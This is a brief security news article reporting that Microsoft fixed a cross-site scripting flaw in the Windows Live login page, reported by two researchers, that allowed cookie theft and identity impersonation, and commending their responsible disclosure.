December 11, 2016

Microsoft fixes Windows Live identity theft flaw

(LiveHacking.Com) – Microsoft has fixed a recently discovered a vulnerability in Microsoft’s Windows Live service that allowed an attacker to steal victims’ online identities.  Abdeljalil S’hit and Yasser Aboukir reported the flaw to Microsoft after they discovered that by using Cross-Site Scripting (XSS) they could execute a malicious script. To exploit the vulnerability the attacker needed to create and error on the Windows Live login page which (due to the XSS problem) would then execute the malicious script.

As a result of the flaw an attacker could impersonate a Windows Live user by gaining full control of the victim’s cookies. Combined with social engineering, this technique could be used to steal a victim’s Windows Live identity. The researchers were asked by the Microsoft Security Research Center to not disclose the flaw while it looked into a fix. The pair duly kept quiet and Microsoft did come up with a fix, but it took three months!

We have created a code change to address the issue and are now testing the changes,” a Microsoft spokesperson told the duo according to ZDNet. “Because changes to the site may affect a large number of users the testing requirements prior to production release are lengthy. Based on the testing schedule and barring any significant regressions the team expects to release an update into production in early May.

Abdeljalil S’hit and Yasser Aboukir are to be applauded for the way they disclosed the issue, but questions remain over Microsoft’s delay in addressing the problem. To Microsoft’s credit they did however  feature the pair on its list of June 2012 Security Researchers for their proper disclosure.